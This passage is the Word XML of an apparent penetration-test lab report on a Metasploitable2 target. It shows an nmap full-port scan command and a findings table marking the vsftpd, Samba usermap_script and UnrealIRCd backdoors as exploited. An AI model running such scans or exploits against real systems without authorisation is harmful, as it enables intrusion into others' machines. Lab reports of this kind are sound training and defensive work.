                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploit Framework 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Reconnaissance and Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Host discovery and full port/service enumeration were performed against the target using Nmap. Initial discovery probes were filtered by the network, requiring the -Pn flag to skip host-discovery pings and scan ports directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -Pn -sV -sC -p- -T4 172.20.10.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The scan identified 30+ open ports exposing a wide range of outdated, unpatched, and in several cases intentionally backdoored services. The full raw scan output is provided in Appendix A. The most significant findings, prioritized by exploitability and impact, are summarized below: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800"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="1200"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="2E75B6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="2E75B6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Port/Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="2E75B6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="2E75B6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="2E75B6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vsftpd 2.3.4 Backdoor Command Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">21/FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical (9.8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba usermap_script Command Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">139,445/SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2007-2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical (10.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">UnrealIRCd 3.2.8.1 Backdoor Command Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6667/IRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2010-2075</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical (10.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak Password Hashing (Offline Cracking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A (local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-916</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High (7.5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3/7 Cracked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 vsftpd 2.3.4 Backdoor Command Execution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F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical (9.8 / 10.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Port/Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">21/TCP (FTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">172.20.10.3 (Metasploitable2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploit Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
